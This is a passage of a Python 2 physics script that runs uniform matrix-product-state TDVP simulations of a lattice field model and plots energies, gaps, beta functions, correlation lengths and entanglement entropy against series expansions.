sp.zeros((3, 3, 3))\n eijk[0, 1, 2] = eijk[1, 2, 0] = eijk[2, 0, 1] = 1\n eijk[0, 2, 1] = eijk[2, 1, 0] = eijk[1, 0, 2] = -1\n \n for al in [0, 1, 2]:\n for be in [0, 1, 2, -1]:\n com = PL[al].dot(N[be]) - 
N[be].dot(PL[al])\n ga_ = None\n if be == -1:\n ga_ = al\n c = -1\n elif al == be:\n ga_ = -1\n c = 1\n else:\n ga_ = sp.argwhere(eijk[al, be, :] != 0)[0]\n c = eijk[al, be, ga_]\n \n com_ = -0.5j * c * N[ga_]\n #print la.norm(com), la.norm(com_)\n print \"[PL_%d, N_%d] = -0.5j * %d * N_%d\" % (al, be, c, ga_), sp.allclose(com, com_)\n \ndef get_ham(g2inv, ops, a=1.):\n U, P, P2, ReUUH, ReUUH_tp = ops\n d = P2.shape[0]\n \n if g2inv == 0:\n h = (1 / (2. * a) * sp.kron(P2, sp.eye(d))).reshape(d, d, d, d)\n else:\n h = (1 / (2. * a * g2inv) * sp.kron(P2, sp.eye(d)).reshape(d, d, d, d) \n - 2 * g2inv / a * ReUUH)\n return h\n \ndef get_ham_tp(g2inv, ops, a=1.):\n U, P, P2, ReUUH, ReUUH_tp = ops\n d = P2.shape[0]\n \n if g2inv == 0:\n h = [[1 / (2. * a) * P2, sp.eye(d)]]\n else:\n fac = -2. * g2inv / a\n ReUUH_ = [[fac * tp[j] if j == 0 else tp[j] for j in [0, 1]] for tp in ReUUH_tp]\n h = [[1 / (2. * a * g2inv) * P2, sp.eye(d)]] + ReUUH_\n return h\n\ndef create_tdvp(D, ham, L=1, zero_tol=0, sanity_checks=False, ham_tp=None):\n s = tdvp.EvoMPS_TDVP_Uniform(D, ham.shape[0], ham, L=L)\n s.zero_tol = zero_tol\n s.sanity_checks = sanity_checks\n s.itr_atol = 1E-14\n s.itr_rtol = 1E-14\n s.ev_arpack_CUDA = use_CUDA\n s.PPinv_use_CUDA = use_CUDA\n s.ham_tp = ham_tp\n return s\n\ndef state_file(s, G, g2inv, max_ir, max_tries=10, loc='state_data/'):\n ts = datetime.datetime.utcnow().strftime(\"%Y%m%d%H%M%S\")\n for i in xrange(max_tries):\n grnd_fname = \"ke_state_G%d_L%d_D%d_maxir%d_g2inv%.4f_T%s_%u.npy\" % (\n G, s.L, s.D, max_ir, g2inv, ts, i)\n try:\n f = open(loc + grnd_fname, 'rb')\n f.close()\n except IOError:\n f = open(loc + grnd_fname, 'wb')\n break\n \n return f, grnd_fname\n\ndef save_result(s, G, g2inv, max_ir, wv=sp.NaN, gap_wv=sp.NaN, v0=None, ops=None, \n existing_fn=None, res_file='petal_res.txt'):\n exc_fn = ''\n if existing_fn is None:\n f, fn = state_file(s, G, g2inv, max_ir)\n s.save_state(f, userdata={'g2inv': g2inv, 'eta': s.eta})\n if not v0 is None:\n exc_fn = fn[:-4] + '_v0.npy'\n sp.save(exc_fn, v0)\n else:\n fn = existing_fn\n \n row = get_res_row(s, G, g2inv, max_ir, wv=wv, gap_wv=gap_wv, ops=ops)\n \n row[cols['exc_fn']] = exc_fn\n row[cols['fn']] = fn\n \n assert len(filter(lambda x: x is None, row)) == 0\n \n resf = open(res_file, 'a')\n fcntl.flock(resf, fcntl.LOCK_EX)\n resf.write(\"\\t\".join(map(str, row)) + \"\\n\")\n resf.close()\n \n return row\n\ndef get_res_row(s, G, g2inv, max_ir, ops=None, wv=sp.NaN, gap_wv=sp.NaN):\n d = s.q\n \n U, P, P2, ReUUH, ReUUH_tp = ops\n \n exUs = sp.array(map(lambda k: s.expect_1s(U[0][0], k=k), range(s.L)))\n exPs = sp.array(map(lambda k: s.expect_1s(P[0], k=k), range(s.L)))\n \n U2 = U[0][0].dot(U[0][0])\n exU2s = sp.array(map(lambda k: s.expect_1s(U2, k=k), range(s.L)))\n \n exP2s = sp.array(map(lambda k: s.expect_1s(P2, k=k).real, range(s.L)))\n \n exReUUHs = sp.array(map(lambda k: s.expect_2s_tp(ReUUH_tp, k=k).real, range(s.L)))\n \n ReUUH2 = ReUUH.reshape(d**2, d**2).dot(ReUUH.reshape(d**2, d**2)).reshape(d,d,d,d)\n s.calc_AA()\n exReUUH2s = sp.array(map(lambda k: s.expect_2s(ReUUH2, k=k).real, range(s.L)))\n \n entrs = sp.array(map(s.entropy, range(s.L)))\n \n row = [None] * len(cols)\n row[cols['G']] = G\n row[cols['g2inv']] = g2inv\n row[cols['D']] = s.D\n row[cols['L']] = s.L\n row[cols['max_ir']] = max_ir\n row[cols['eta']] = s.eta.real\n row[cols['max_ir_oc']] = s.basis_occupancy()[-1]\n row[cols['energy']] = s.h_expect.real\n row[cols['cl']] = s.correlation_length()\n row[cols['entr_max']] = entrs.max()\n 
row[cols['U_av']] = exUs.mean()\n row[cols['U_0']] = exUs[0]\n row[cols['U2_0']] = exU2s[0]\n row[cols['P_av']] = exPs.mean()\n row[cols['P_0']] = exPs[0]\n row[cols['P2_0']] = exP2s[0]\n row[cols['ReUUH_av']] = exReUUHs.mean()\n row[cols['ReUUH_0']] = exReUUHs[0]\n row[cols['ReUUH2_0']] = exReUUH2s[0]\n row[cols['wv_dom']] = wv\n row[cols['wv_fit']] = sp.NaN\n row[cols['gap']] = gap_wv\n \n return row\n \nDCOLRANGE = sp.arange(16, 256 + 1)\nDCOLPAL = cm.jet\ndef get_D_colmap():\n cmap = cm.ScalarMappable(cmap=DCOLPAL)\n cmap.set_array(DCOLRANGE)\n cmap.autoscale()\n\n return cmap\n\nLMARKERS = [None, '+', 'x', 'x', 'x']\ndef get_markers():\n #import matplotlib.markers as mrk\n #return mrk.MarkerStyle.markers.keys()\n return LMARKERS\n \ndef plot_colormap():\n import matplotlib.pyplot as plt\n \n cm = get_D_colmap()\n \n Ds = range(16, 128)\n \n plt.scatter(Ds, Ds, s=80, c=cm.to_rgba(Ds))\n plt.show()\n\ndef plot_Ds(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols), dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]], ress[mask, cols['D']], s=80, c=cm.to_rgba(ress[mask, 2]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$D$')\n plt.show()\n \ndef plot_energy(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols), dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]], ress[mask, cols['energy']], s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$h$')\n plt.show()\n \ndef plot_energy_deriv(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols), dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n x = ress[:, cols[PARAM]]\n d1_y_Ham = -2. * ress[:, cols['ReUUH_av']] - x**(-2) / 2. 
* ress[:, cols['P2_0']]\n \n dx = sp.ediff1d(x)\n d_x = x[:-1] + dx / 2.\n d1_y = sp.ediff1d(ress[:, cols['energy']]) / dx\n d2_y = sp.ediff1d(d1_y_Ham) / dx\n dx_fd = dx[:-1]\n d2_x_fd = x[:-2] + sp.ediff1d(d_x)\n d2_y_fd = sp.ediff1d(d1_y) / dx_fd\n \n plt.figure(1)\n plt.plot(d_x, d1_y, '--')\n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(x[mask], d1_y_Ham[mask], s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$dE/d' + PARAM_TEX + '$')\n \n plt.figure(2)\n plt.plot(d_x, d2_y, '-o')\n plt.plot(d2_x_fd, d2_y_fd, '--')\n plt.xlabel('$g^{-2}$')\n plt.ylabel('$d^2E/d(' + PARAM_TEX + ')^2$')\n print \"d2e min at:\", d_x[d2_y.argmin()]\n plt.show()\n \ndef plot_beta(res_file=\"petal_res.txt\", G=1, fmt='o', lbl=None, plot_an=True, \n usualg=False, SBtol=1E-4, ecol=None, fcol=None, **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols), dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, G=G, **kwargs)\n \n filt = abs(ress[:, cols['U_0']]) < SBtol\n ress = ress[filt, :]\n \n if G == 1:\n N = 2\n g2i_fac = sp.sqrt(2)\n E_fac = 1. / sp.sqrt(2)\n elif G == 2:\n N = 4\n g2i_fac = 4\n E_fac = 1.\n \n x = 2 * (g2i_fac * ress[:, cols[PARAM]])**2\n #plot_x = 1. / (g2i_fac * ress[:, cols[PARAM]])\n #d_plot_x = sp.ediff1d(plot_x)\n #plot_x = plot_x[:-1] - d_plot_x / 2\n #plot_x = plot_x[:-1]\n y = 2 * g2i_fac * ress[:, cols[PARAM]] * E_fac * ress[:, cols['gap']]\n\n dx = sp.ediff1d(x)\n d_x = x[:-1] + dx / 2 #use midpoints as x coord for the derivative\n plot_x = sp.sqrt(2 / d_x)\n dy = sp.ediff1d(y)\n d1_y = dy / dx\n d_y = y[:-1] + dy / 2\n \n m_beta_g = 1. / (1 - 2 * d_x * d1_y / d_y)\n \n g_app = sp.linspace(0, 4, num=1000)\n \n #The following strong coupling series expansions are from Hamer et al. 1979\n if G == 2:\n _p = [1, 0.064665, -0.19101, 0.015944, 0.052396, -7.2098E-3, 5.572E-5, 1.2339E-3]\n _p = _p[::-1]\n _q = [1, 0.064665, 0.47565, 0.059053, 0.063937, 0.0124, 0.02263, -4.419E-4, 3.3764E-3]\n _q = _q[::-1]\n y_app = sp.polyval(_p, 1./g_app) / sp.polyval(_q, 1./g_app)\n elif G == 1:\n _p = [1., -0.1413, -0.2589, -0.1662, 0.09704]\n _p = _p[::-1]\n _q = [1., 1.8587, 0.9584, 0.1664, -0.07654]\n _q = _q[::-1]\n y_app = sp.polyval(_p, 2./g_app**2) / sp.polyval(_q, 2./g_app**2)\n\n y_weak = (N - 2) * g_app / (2 * sp.pi) + (N - 2) * g_app**2 / (4 * sp.pi**2)\n \n xfac = 1.\n yfac = 1.\n if usualg:\n xfac = g2i_fac\n yfac = 1. 
/ g2i_fac\n \n if plot_an:\n plt.plot([0, xfac * 4], [yfac, yfac], 'k-')\n if N > 2:\n plt.plot(xfac * g_app, yfac * y_weak, 'g-', label='WC')\n if G == 1:\n filt = y_app < 0\n app_start = g_app[filt].max()\n filt = g_app > app_start\n else:\n filt = sp.ones((g_app.shape[0],), dtype=bool)\n l, = plt.plot(xfac * g_app[filt], yfac * y_app[filt], 'k--', label=\"Pad\\\\'{e}\")\n l.set_dashes((1.5, 0.5))\n \n filt = (m_beta_g > 0) * (m_beta_g < 1)\n plt.plot(xfac * plot_x[filt], yfac * m_beta_g[filt], fmt, label=lbl,\n markersize=2.5, markeredgewidth=0.5,\n markeredgecolor=ecol, markerfacecolor=fcol)\n# pf, cf = sp.polyfit(xfac * plot_x[filt], yfac * m_beta_g[filt], 1, cov=True)\n# print \"fit\", pf, cf, -pf[1]/pf[0]\n# plt.plot(xfac * g_app, sp.polyval(pf, xfac * g_app), '-')\n \n if usualg:\n plt.xlabel('$g^2$' )\n plt.ylabel('$-\\\\beta(g^2) / g^{2}$')\n else:\n plt.xlabel('$\\\\tilde{g}$' )\n plt.ylabel('$-\\\\beta(\\\\tilde g) / \\\\tilde{g}$')\n #plt.xlim((0, 2.1))\n #plt.ylim((0, 1.2))\n plt.show()\n \ndef filt_res(ress, G=1, pars=None, max_irs=None, Ds=None, Ls=None, lowest_en=False, par_decimals=4):\n filt = ress[:, cols['G']] == G\n ress = ress[filt, :]\n \n if not max_irs is None:\n filt = sp.in1d(ress[:, cols['max_ir']], max_irs)\n ress = ress[filt, :]\n \n if not Ds is None:\n filt = sp.in1d(ress[:, cols['D']], Ds)\n ress = ress[filt, :]\n \n if not pars is None:\n filt = sp.in1d(sp.around(ress[:, cols[PARAM]], decimals=par_decimals), sp.around(pars, decimals=par_decimals))\n ress = ress[filt, :]\n \n if Ls is None:\n Ls = sp.unique(ress[:, cols['L']])\n else:\n filt = sp.in1d(ress[:, cols['L']], Ls)\n ress = ress[filt, :]\n \n if lowest_en:\n ka_rounded = sp.around(ress[:, cols[PARAM]], decimals=par_decimals)\n en_rounded = sp.around(ress[:, cols['energy']], decimals=12)\n\n to_sort = sp.column_stack((ka_rounded, ress[:, cols[PARAM]], en_rounded,\n ress[:, cols['eta']])).view('complex128,complex128,complex128,complex128')\n\n sort1 = sp.argsort(to_sort, axis=0, order=['f1']) #first sort by full precision param\n #must now sort by rounded values for unique to work properly\n #must also use a stable algo to maintain ordering\n sort2 = sp.argsort(to_sort[sort1], order=['f0', 'f2', 'f3'], axis=0, kind='mergesort')\n\n sort_final = sort1[sort2]\n to_sort = to_sort.view(sp.float64)\n to_sort = sp.squeeze(to_sort)\n sort_final = sp.squeeze(sort_final)\n \n #filter based on rounded values. 
return_index forces merge_sort, which is stable!\n blah, unq_ind, blah2 = sp.unique(to_sort[sort_final, 0], return_index=True, return_inverse=True)\n sort_filt = sort_final[unq_ind]\n \n ress = ress[sort_filt, :]\n else:\n sort1 = sp.argsort(ress[:, cols[PARAM]])\n ress = ress[sort1, :]\n \n return ress, Ls\n \ndef get_num_ress(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n ress, Ls = filt_res(ress, **kwargs)\n \n return ress\n \ndef get_col(colname, res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n ress, Ls = filt_res(ress, **kwargs)\n \n return ress[:, cols[colname]]\n \ndef plot_col(colname, res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]], ress[mask, cols[colname]], s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel(colname)\n plt.show()\n \ndef plot_U00(res_file=\"petal_res.txt\", broken_tol=1E-3, **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]].real, abs(ress[mask, cols['U_0']]), s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n broken = abs(ress[mask, cols['U_0']]) > broken_tol\n print \"L=\", L, \"last symm. g2inv =\", ress[mask, cols[PARAM]][broken].min().real\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$U_{0,0}$')\n plt.show()\n \ndef plot_gap(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n if not sp.all(sp.isnan(ress[mask, cols['gap']])):\n #print ress[mask, 1], ress[mask, -1], cm.to_rgba(ress[mask, 2])\n plt.scatter(ress[mask, cols[PARAM]], ress[mask, cols['gap']], s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$(E_1 - E_0)$')\n plt.show()\n \ndef plot_gap_log(res_file=\"petal_res.txt\", G=1, plot_an=True, lbl=None, \n fmt='o', ecol=None, fcol=None, usualg=False, SBtol=1E-3, \n C=None, eta_corr=True, **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n\n if G == 1:\n N = 2\n g2i_fac = sp.sqrt(2)\n E_fac = 1. / sp.sqrt(2)\n elif G == 2:\n N = 4\n g2i_fac = 4\n E_fac = 1.\n \n x_app = sp.linspace(0, 3, num=1000) #1/g'\n \n #The following strong coupling series expansions are from Hamer et al. 
1979\n if G == 2:\n #se = [1.0, -1./6, +0.005208, +0.0003798, +0.00000417397, -0.00000036076, -0.000000252236]\n #The above is just 1/3 times the following:\n se = [3., -0.5, 0.015625, 1.139323E-3, 1.25219E-5, -1.082289E-6, -7.56709E-7]\n se = se[::-1]\n y_app = sp.sqrt(1./x_app**3 * 1./4.) * sp.polyval(se, 2 * x_app**2)\n elif G == 1:\n se = [1., -1., 0.125, 0.03125, 1.438802E-2, 6.002063E-3, 2.26148E-4, 6.95799E-4, -1.752E-4]\n se = se[::-1]\n y_app = sp.sqrt(1./x_app**3 * 1./4.) * sp.polyval(se, 2 * x_app**2)\n ##Hornby and Barber 1985\n #se = [1., -2., 0.5, 0.25, 0.2302083, 0.192065972, 0.0144735794,\n # 0.0890622894, -0.0448071196, 0.0359987647, -0.0818017597]\n #se = se[::-1]\n #y_app = sp.sqrt(1./x_app**3 * 1./4.) * sp.polyval(se, 1 * x_app**2)\n \n xfac = 1\n yfac = 1\n if usualg:\n xfac = 1. / g2i_fac\n yfac = sp.sqrt(g2i_fac) / E_fac\n \n if plot_an:\n l, = plt.plot(xfac * x_app, yfac * y_app, 'k--', label=\"SC\")\n l.set_dashes((1.5, 0.5))\n \n if G == 2 and plot_an:\n #value from Hasenratz et al. 1990, modified for spatial discretisation \n #using Shigemitsu & Kogut 1981 (based on Parisi's result for the\n #Euclidean lattice). \n if C is None:\n C = 8 * sp.exp(0.5) * sp.sqrt(32./(sp.pi * sp.e))\n y_weak = C * sp.sqrt(sp.pi) * sp.exp(-sp.pi * x_app)\n #Correct for time-space asymmetry s.t. renormalised theory is LI.\n #Also from Shigemitsu & Kogut.\n if eta_corr:\n # Comparing with the paper, this original line\n # y_weak /= sp.sqrt(1 + 1. / x_app / sp.pi)\n # had a sign error!\n y_weak /= sp.sqrt(1 - 1. / x_app / sp.pi)\n plt.plot(xfac * x_app, yfac * y_weak, 'g-', label='WC')\n \n ress, Ls = filt_res(ress, G=G, **kwargs)\n filt = abs(ress[:, cols['U_0']]) < SBtol\n ress = ress[filt, :] \n \n plt.plot(xfac * g2i_fac * ress[:, cols[PARAM]], \n yfac * E_fac * ress[:, cols['gap']] / sp.sqrt(g2i_fac * ress[:, cols[PARAM]]), \n fmt, label=lbl, markersize=2.5, markeredgewidth=0.5,\n markeredgecolor=ecol, markerfacecolor=fcol)\n \n if usualg:\n plt.xlabel('$g^{-2}$' )\n plt.ylabel('$(E_1 - E_0) g / \\\\sqrt{\\\\eta}$')\n else:\n plt.xlabel('$1 / \\\\tilde g$' )\n plt.ylabel('$(E_1 - E_0) \\\\sqrt{\\\\tilde g} / \\\\sqrt{\\\\eta}$')\n plt.yscale('log')\n #plt.xlim((0, 3))\n #plt.ylim((0.03, 10))\n plt.show()\n \ndef plot_wv(res_file=\"petal_res.txt\", scattersize=80, lw=None, pos_shift=False, \n return_data=False, **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n plts = []\n \n allxs = []\n allys = []\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n if sp.sometrue(mask):\n notlocks = (abs(ress[mask, cols['wv_dom']] / L) % (sp.pi / 4)) >= 1E-6\n print \"Last not-lock at:\", ress[mask, cols[PARAM]][notlocks].max()\n if L == 1:\n xs = ress[mask, cols[PARAM]]\n ys = abs(ress[mask, cols['wv_dom']]) / sp.pi\n cs = ress[mask, cols['D']]\n elif L > 1:\n xs = []\n ys = []\n cs = []\n maxn = int(L) / 2\n for n in xrange(maxn + 1):\n if n > 0:\n xs.append(ress[mask, cols[PARAM]])\n ys.append(n * 2. / L - abs(ress[mask, cols['wv_dom']]) / sp.pi / L)\n cs.append(ress[mask, cols['D']])\n if pos_shift and n < maxn:\n xs.append(ress[mask, cols[PARAM]])\n ys.append(n * 2. 
/ L + abs(ress[mask, cols['wv_dom']]) / sp.pi / L)\n cs.append(ress[mask, cols['D']])\n xs = sp.array(xs).ravel()\n ys = sp.array(ys).ravel()\n cs = sp.array(cs).ravel()\n res = plt.scatter(xs, ys, s=scattersize, c=cm.to_rgba(cs), marker=mrks[int(L)],\n lw=lw)\n plts.append(res)\n allxs.append(xs)\n allys.append(ys)\n allxs = sp.concatenate(allxs)\n allys = sp.concatenate(allys)\n tbl = sp.column_stack((allxs, allys))\n\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$k/\\\\pi$')\n plt.show()\n \n return plts, tbl\n \ndef plot_wv_locks(Ds=None, res_file=\"petal_res.txt\", scattersize=80, lowest_en=True, **kwargs):\n ress_ = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n if Ds is None:\n Ds = sp.unique(ress_[:, cols['D']])\n else:\n Ds = sp.array(Ds)\n \n ka_lls = sp.zeros((len(Ds),), dtype=sp.float64)\n ka_lls.fill(sp.NaN)\n for i, D in enumerate(Ds):\n ress, Ls = filt_res(ress_.copy(), Ds=[D], lowest_en=lowest_en, **kwargs)\n notlocks = (abs(ress[:, cols['wv']] / ress[:, cols['L']]) % (sp.pi / 4)) >= 1E-6\n ka_ll = ress[:, cols[PARAM]][notlocks].max()\n ka_lls[i] = ka_ll.real\n \n pfit, covfit = sp.polyfit(1. / Ds, ka_lls, 1, cov=True)\n fitka = sp.linspace(0, (1. / Ds).max() * 1.1)\n \n print pfit[1], sp.sqrt(covfit[1, 1])\n \n plt.plot(1. / Ds, ka_lls, 'bo')\n plt.plot(fitka, sp.polyval(pfit, fitka), 'k-')\n plt.errorbar(0, pfit[1], yerr=sp.sqrt(covfit[1, 1]), fmt='b')\n plt.xlabel('$1/D$')\n plt.ylabel('$' + PARAM_TEX + '_\\\\mathrm{lock}$')\n plt.xlim((-0.0005, 0.015))\n plt.show()\n \ndef plot_lcl(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]], sp.log(ress[mask, cols['cl']]), s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$\\\\log(\\\\xi)$')\n plt.show()\n \ndef plot_icl(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]], 1/ress[mask, cols['cl']], s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$\\\\xi^{-1}$')\n plt.show()\n \ndef plot_entropy(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]], ress[mask, cols['entr_max']], s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$S$')\n plt.show()\n \ndef plot_cc(Ds, L=1, max_ir=5, pars=None, offset=0, res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as 
plt\n \n ress, Ls = filt_res(ress, pars=pars, Ds=Ds, Ls=[L], **kwargs)\n \n filt = (ress[:, cols['max_ir']] == max_ir) * (ress[:, cols['L']] == L) * sp.in1d(ress[:, cols['D']], Ds)\n ress = ress[filt, :]\n \n if pars is None:\n pars = sp.unique(ress[:, cols[PARAM]])\n ccs = sp.array([sp.NaN] * len(pars))\n cc_vars = sp.array([sp.NaN] * len(pars))\n fits = [None] * len(pars)\n Dss = [None] * len(pars)\n logcls = [None] * len(pars)\n entrs = [None] * len(pars)\n \n for i in xrange(len(pars)):\n par = pars[i]\n mask = (abs(ress[:, cols[PARAM]] - par) < 1E-12)\n \n Dss[i] = ress[mask, cols['D']]\n if not sp.all(sp.in1d(Ds, Dss[i])):\n print \"Not all Ds present at\", par\n continue\n \n logcls[i] = sp.log2(ress[mask, cols['cl']])\n entrs[i] = ress[mask, cols['entr_max']]\n try:\n p, V = sp.polyfit(logcls[i], entrs[i], 1, cov=True)\n ccs[i] = p[0] * 6\n cc_vars[i] = V[0, 0] * 6**2\n fits[i] = sp.polyval(p, logcls[i])\n except sp.linalg.LinAlgError:\n print \"cc fit error with\", par\n \n nf = sp.invert(sp.isnan(ccs))\n tvar = sp.sum(ccs[nf]**2 * cc_vars[nf])\n print ccs[nf].mean(), sp.sqrt(tvar/len(ccs[nf]))\n \n plt.figure(1) \n plt.errorbar(pars, ccs, yerr=sp.sqrt(cc_vars), fmt='bx', capsize=1.5, elinewidth=0.3, markersize=2, markeredgewidth=0.3)\n plt.xlabel('$' + PARAM_TEX + '$')\n plt.ylabel('$c$')\n\n plt.figure(2)\n cur_off = 0\n for i in xrange(len(pars)): \n if not fits[i] is None:\n l, = plt.plot(logcls[i], cur_off + entrs[i], 'o', \n label=\"$\" + PARAM_TEX + \" = %.2f\" % pars[i] + \n \"$, $c=%.3f \\\\pm %.3f$\" % (ccs[i], sp.sqrt(cc_vars[i])))\n plt.plot(logcls[i], cur_off + fits[i], '-', color=l.get_color())\n cur_off -= offset\n plt.xlabel(\"$\\\\log(\\\\xi)$\")\n if cur_off == 0:\n plt.ylabel(\"$S$\")\n else:\n plt.ylabel(\"$S +$ const.\")\n plt.legend(loc=4)\n \n plt.show()\n\ndef calc_cf(s, op, d=20, k=0):\n ccf, ex1, ex2 = s.correlation_1s_1s(op, op, d, k=k, return_exvals=True)\n \n var = sp.zeros((s.L), dtype=sp.complex128)\n op2 = op.dot(op)\n for k in xrange(s.L):\n var[k] = s.expect_1s(op2, k) - ex1[k]**2\n \n return ccf, ex1, var\n\ndef pub_plots_prep():\n import matplotlib.pyplot as plt\n plt.rcParams['text.usetex'] = True\n plt.rcParams['ps.usedistiller'] = 'xpdf'\n plt.rcParams['font.size'] = 8\n plt.rcParams['font.family'] = 'serif'\n plt.rcParams['font.serif'] = 'Computer Modern Roman' \n \n plt.rcParams['figure.figsize'] = [3.5, 2.5] #inches...\n plt.rcParams['figure.subplot.bottom'] = 0.2\n plt.rcParams['figure.subplot.left'] = 0.16\n plt.rcParams['figure.subplot.top'] = 0.95\n plt.rcParams['figure.subplot.right'] = 0.96\n plt.rcParams['lines.markersize'] = 2.5\n plt.rcParams['lines.markeredgewidth'] = 0\n plt.rcParams['lines.linewidth'] = 0.5\n \n plt.rcParams['legend.fancybox'] = True\n plt.rcParams['legend.fontsize'] = 8\n \n plt.rcParams['axes.linewidth'] = 0.5\n\ndef pub_plot_gaps(usualg=False):\n import matplotlib.pyplot as plt\n \n if not usualg:\n g2i_fac = 4\n E_fac = 1\n else:\n g2i_fac = 1\n E_fac = 1. 
